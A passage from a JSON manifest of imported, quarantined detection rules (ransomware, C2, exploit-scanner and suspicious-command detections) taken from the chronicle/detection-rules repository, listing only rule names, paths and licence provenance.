"detections/chronicle-imports/_quarantine/sap-user-creates-and-uses-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "sap_user_creates_and_uses_new_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_user_creates_and_uses_new_user.yaral" } }, { "id": "chronicle-detection-rules-scanner-poc-for-cve20190708-rdp-rce-vuln", "type": "detection", "name": "scanner_poc_for_cve20190708_rdp_rce_vuln", "description": "scanner_poc_for_cve20190708_rdp_rce_vuln", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scanner-poc-for-cve20190708-rdp-rce-vuln.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scanner_poc_for_cve20190708_rdp_rce_vuln", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/windows/scanner_poc_for_cve_2019_0708_rdp_rce_vuln.yaral" } }, { "id": "chronicle-detection-rules-scarab-ransomware", "type": "detection", "name": "scarab_ransomware", "description": "scarab_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scarab-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scarab_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/scarab_ransomware_part_1.yaral" } }, { "id": "chronicle-detection-rules-scarab-ransomware-part-1", "type": "detection", "name": "scarab_ransomware_part_1", "description": "scarab_ransomware_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scarab-ransomware-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scarab_ransomware_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/scarab_ransomware_part_2.yaral" } }, { "id": "chronicle-detection-rules-scheduled-task-creation", "type": "detection", "name": "scheduled_task_creation", "description": "scheduled_task_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scheduled_task_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/scheduled_task_creation.yaral" } }, { "id": "chronicle-detection-rules-schtask-creation-sysmon", "type": "detection", "name": "schtask_creation_sysmon", "description": "schtask_creation_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/schtask-creation-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "schtask_creation_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/schtask_creation__sysmon.yaral" } }, { "id": "chronicle-detection-rules-schtask-from-user-profile-sysmon", "type": "detection", "name": "schtask_from_user_profile_sysmon", "description": "schtask_from_user_profile_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/schtask-from-user-profile-sysmon.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "schtask_from_user_profile_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/schtask_from_user_profile__sysmon.yaral" } }, { "id": "chronicle-detection-rules-secure-deletion-with-sdelete", "type": "detection", "name": "secure_deletion_with_sdelete", "description": "secure_deletion_with_sdelete", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/secure-deletion-with-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "secure_deletion_with_sdelete", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/secure_deletion_with_sdelete.yaral" } }, { "id": "chronicle-detection-rules-security-eventlog-cleared", "type": "detection", "name": "security_eventlog_cleared", "description": "security_eventlog_cleared", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/security-eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "security_eventlog_cleared", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/security_eventlog_cleared.yaral" } }, { "id": "chronicle-detection-rules-session-manager-autorun-keys-modification", "type": "detection", "name": "session_manager_autorun_keys_modification", "description": "session_manager_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/session-manager-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "session_manager_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/session_manager_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-sharprdp-execution", "type": "detection", "name": "sharprdp_execution", "description": "sharprdp_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, 
"source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sharprdp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sharprdp_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/sharprdp_execution.yaral" } }, { "id": "chronicle-detection-rules-shells-spawned-by-web-servers", "type": "detection", "name": "shells_spawned_by_web_servers", "description": "shells_spawned_by_web_servers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/shells-spawned-by-web-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "shells_spawned_by_web_servers", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/shells_spawned_by_web_servers.yaral" } }, { "id": "chronicle-detection-rules-shimcache-flush", "type": "detection", "name": "shimcache_flush", "description": "shimcache_flush", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/shimcache-flush.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "shimcache_flush", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/shimcache_flush.yaral" } }, { "id": "chronicle-detection-rules-signal-desktop-app-privilege-escalation", "type": "detection", "name": "signal_desktop_app_privilege_escalation", "description": "signal_desktop_app_privilege_escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/signal-desktop-app-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "signal_desktop_app_privilege_escalation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/signal_desktop_app_privilege_escalation.yaral" } }, { "id": "chronicle-detection-rules-sigred-cve20201350-dns-remote-code-exploit-via-httpproxy-logs", "type": "detection", "name": "sigred_cve20201350_dns_remote_code_exploit_via_httpproxy_logs", "description": "sigred_cve20201350_dns_remote_code_exploit_via_httpproxy_logs", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sigred-cve20201350-dns-remote-code-exploit-via-httpproxy-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sigred_cve20201350_dns_remote_code_exploit_via_httpproxy_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/proxy/sigred__cve_2020_1350_dns_remote_code_exploit__via_http_proxy_logs.yaral" } }, { "id": "chronicle-detection-rules-smbexecpy-service-installation", "type": "detection", "name": "smbexecpy_service_installation", "description": "smbexecpy_service_installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/smbexecpy-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "smbexecpy_service_installation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/smbexec_py_service_installation.yaral" } }, { "id": 
"chronicle-detection-rules-snatch-ransomware-sysmon-behaviour", "type": "detection", "name": "snatch_ransomware_sysmon_behaviour", "description": "snatch_ransomware_sysmon_behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/snatch-ransomware-sysmon-behaviour.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "snatch_ransomware_sysmon_behaviour", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/snatch_ransomware__sysmon_behaviour.yaral" } }, { "id": "chronicle-detection-rules-socks-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "socks_malware_detector_sysmon_behavior_august_2019", "description": "socks_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/socks-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "socks_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/socks_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "chronicle-detection-rules-sodinokibi-ransomware-detector-sysmon-behaviorjuly-2019", "type": "detection", "name": "sodinokibi_ransomware_detector_sysmon_behaviorjuly_2019", "description": "sodinokibi_ransomware_detector_sysmon_behaviorjuly_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sodinokibi-ransomware-detector-sysmon-behaviorjuly-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sodinokibi_ransomware_detector_sysmon_behaviorjuly_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/sodinokibi_ransomware_detector__sysmon_behavior__july_2019.yaral" } }, { "id": "chronicle-detection-rules-sofacy-apt-c2-domain-communication", "type": "detection", "name": "sofacy__apt_c2_domain_communication", "description": "sofacy__apt_c2_domain_communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sofacy-apt-c2-domain-communication.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sofacy__apt_c2_domain_communication", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/sofacy___apt_c2_domain_communication.yaral" } }, { "id": "chronicle-detection-rules-solarwinds-backdoor-c2-host-name-detected-via-dns", "type": "detection", "name": "solarwinds_backdoor_c2_host_name_detected_via_dns", "description": "solarwinds_backdoor_c2_host_name_detected_via_dns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/solarwinds-backdoor-c2-host-name-detected-via-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "solarwinds_backdoor_c2_host_name_detected_via_dns", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/dns/solarwinds_backdoor_c2_host_name_detected___via_dns.yaral" } }, { "id": "chronicle-detection-rules-solarwinds-backdoor-c2-host-name-detected-via-proxy", "type": "detection", "name": "solarwinds_backdoor_c2_host_name_detected_via_proxy", "description": "solarwinds_backdoor_c2_host_name_detected_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/solarwinds-backdoor-c2-host-name-detected-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "solarwinds_backdoor_c2_host_name_detected_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/solarwinds_backdoor_c2_host_name_detected___via_proxy.yaral" } }, { "id": "chronicle-detection-rules-spear-phishing-attack-on-gov-in-poland-apt28-sysmon", "type": "detection", "name": "spear_phishing_attack_on_gov_in_poland_apt28_sysmon", "description": "spear_phishing_attack_on_gov_in_poland_apt28_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/spear-phishing-attack-on-gov-in-poland-apt28-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "spear_phishing_attack_on_gov_in_poland_apt28_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/spear_phishing_attack_on_gov_in_poland_apt28?__sysmon.yaral" } }, { "id": 
"chronicle-detection-rules-sticky-key-like-backdoor-usage", "type": "detection", "name": "sticky_key_like_backdoor_usage", "description": "sticky_key_like_backdoor_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sticky-key-like-backdoor-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sticky_key_like_backdoor_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/sticky_key_like_backdoor_usage.yaral" } }, { "id": "chronicle-detection-rules-stop-ransomware-and-vidar-ransomware-detection", "type": "detection", "name": "stop_ransomware_and_vidar_ransomware_detection", "description": "stop_ransomware_and_vidar_ransomware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/stop-ransomware-and-vidar-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "stop_ransomware_and_vidar_ransomware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/stop_ransomware_and_vidar_ransomware_detection.yaral" } }, { "id": "chronicle-detection-rules-strike-network-inventory-explorer-unquoted-service-path", "type": "detection", "name": "strike_network_inventory_explorer__unquoted_service_path", "description": "strike_network_inventory_explorer__unquoted_service_path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/strike-network-inventory-explorer-unquoted-service-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "strike_network_inventory_explorer__unquoted_service_path", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/10_strike_network_inventory_explorer___unquoted_service_path.yaral" } }, { "id": "chronicle-detection-rules-suspicious-access-to-windows-setup-files", "type": "detection", "name": "suspicious_access_to_windows_setup_files", "description": "suspicious_access_to_windows_setup_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/suspicious-access-to-windows-setup-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_access_to_windows_setup_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/access_to_windows_setup_files.yaral" } }, { "id": "chronicle-detection-rules-suspicious-asn", "type": "detection", "name": "suspicious_asn", "description": "suspicious_asn", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-asn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_asn", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/suspicious_asn.yaral" } }, { "id": "chronicle-detection-rules-suspicious-asn-watchlist", "type": "detection", "name": "suspicious_asn_watchlist", "description": "suspicious_asn_watchlist", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/suspicious-asn-watchlist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_asn_watchlist", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/suspicious_asn_watchlist.yaral" } }, { "id": "chronicle-detection-rules-suspicious-calculator-usage", "type": "detection", "name": "suspicious_calculator_usage", "description": "suspicious_calculator_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-calculator-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_calculator_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_calculator_usage.yaral" } }, { "id": "chronicle-detection-rules-suspicious-certreq-command-to-download", "type": "detection", "name": "suspicious_certreq_command_to_download", "description": "suspicious_certreq_command_to_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-certreq-command-to-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_certreq_command_to_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_certreq_command_to_download.yaral" } }, { "id": "chronicle-detection-rules-suspicious-certutil-command", "type": "detection", "name": "suspicious_certutil_command", "description": "suspicious_certutil_command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-certutil-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_certutil_command", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_certutil_command.yaral" } }, { "id": "chronicle-detection-rules-suspicious-change-in-hosts-file", "type": "detection", "name": "suspicious_change_in_hosts_file", "description": "suspicious_change_in_hosts_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-change-in-hosts-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_change_in_hosts_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/change_in_hosts_file.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-execution", "type": "detection", "name": "suspicious_command_execution", "description": "suspicious_command_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 